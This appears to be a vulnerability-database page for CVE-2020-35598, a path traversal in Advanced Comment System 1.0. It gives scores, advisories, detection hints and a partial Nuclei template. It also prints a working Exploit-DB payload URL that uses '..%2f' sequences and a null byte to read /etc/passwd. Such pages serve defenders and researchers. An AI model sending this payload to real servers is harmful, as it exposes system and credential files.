CVE-2020-35598
published 2020-12-23CVE-2020-35598: ACS Advanced Comment System 1.0 is affected by Directory Traversal via an advanced_component_system/index.php?ACS_path=..%2f URI. NOTE: this might be the same…
PriorityP262high7.5CVSS 3.1
AVNACLPRNUINSUCHINAN
EXPLOIT
EPSS
21.00%
97.3th percentile
ACS Advanced Comment System 1.0 is affected by Directory Traversal via an advanced_component_system/index.php?ACS_path=..%2f URI. NOTE: this might be the same as CVE-2009-4623
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| advanced_comment_system_project | advanced_comment_system | — | — |
| plohni | advanced_comment_system | — | — |
Detection & IOCsextracted from sources · hover to see the quote
url/advanced_component_system/index.php?ACS_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00↗
- →Look for GET requests to /advanced_component_system/index.php with the ACS_path parameter containing URL-encoded path traversal sequences (..%2f) and a null byte (%00) terminator targeting /etc/passwd. ↗
- →A successful exploitation response will return HTTP 200 and contain the string matching 'root:.*:0:0:' in the body, indicating /etc/passwd was read. ↗
- →The vulnerability is triggered via the ACS_path GET parameter; monitor web logs for any requests to this endpoint containing '%2f' (URL-encoded slash) sequences indicative of directory traversal. ↗
- ·The exploit uses a null byte (%00) to terminate the path string, which is a technique that may only work on PHP versions where null byte injection in file paths is effective (typically PHP < 5.3.4). ↗
- ·This CVE may overlap with CVE-2009-4623, suggesting the vulnerability has been known for over a decade and affects the same codebase. ↗
CVSS provenance
nvdv3.17.5HIGHCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:P/I:N/A:N
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-3896-fhmw-qp2v: ACS Advanced Comment System 1
ghsa_unreviewed·2022-05-24
CVE-2020-35598 [HIGH] CWE-22 GHSA-3896-fhmw-qp2v: ACS Advanced Comment System 1
ACS Advanced Comment System 1.0 is affected by Directory Traversal via an advanced_component_system/index.php?ACS_path=..%2f URI.
GHSA
GHSA-6g86-c9gm-gqg5: Multiple PHP remote file inclusion vulnerabilities in Advanced Comment System 1
ghsa_unreviewed·2022-05-02·CVSS 7.5
CVE-2009-4623 [HIGH] CWE-94 GHSA-6g86-c9gm-gqg5: Multiple PHP remote file inclusion vulnerabilities in Advanced Comment System 1
Multiple PHP remote file inclusion vulnerabilities in Advanced Comment System 1.0 allow remote attackers to execute arbitrary PHP code via a URL in the ACS_path parameter to (1) index.php and (2) admin.php in advanced_comment_system/. NOTE: this might only be a vulnerability when the administrator has not followed installation instructions in install.php. NOTE: this might be the same as CVE-2020-35598.
No detection rules found.
Exploit-DB
Advanced Comment System 1.0 - 'ACS_path' Path Traversal
exploitdb·2021-01-04·CVSS 7.5
CVE-2020-35598 [HIGH] Advanced Comment System 1.0 - 'ACS_path' Path Traversal
Advanced Comment System 1.0 - 'ACS_path' Path Traversal
---
# Exploit Title: Advanced Comment System 1.0 - 'ACS_path' Path Traversal
# Date: Fri, 11 Dec 2020
# Exploit Author: Francisco Javier Santiago Vázquez aka "n0ipr0cs"
# Vendor Homepage: Advanced Comment System - ACS
# Version: v1.0
# CVE: CVE-2020-35598
http://localhost/advanced_component_system/index.php?ACS_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00
Nuclei
Advanced Comment System 1.0 - Local File Inclusion
nuclei·CVSS 7.5
CVE-2020-35598 [HIGH] Advanced Comment System 1.0 - Local File Inclusion
Advanced Comment System 1.0 - Local File Inclusion
ACS Advanced Comment System 1.0 is affected by local file inclusion via an advanced_component_system/index.php?ACS_path=..%2f URI.
Template:
id: CVE-2020-35598
info:
name: Advanced Comment System 1.0 - Local File Inclusion
author: daffainfo
severity: high
description: ACS Advanced Comment System 1.0 is affected by local file inclusion via an advanced_component_system/index.php?ACS_path=..%2f URI.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire system.
remediation: |
Apply the latest patch or update provided by the vendor to fix the local file inclusion vulnerability in the Advanced Comment System 1.0.
reference:
- h
No writeups or analysis indexed.
2020-12-23
Published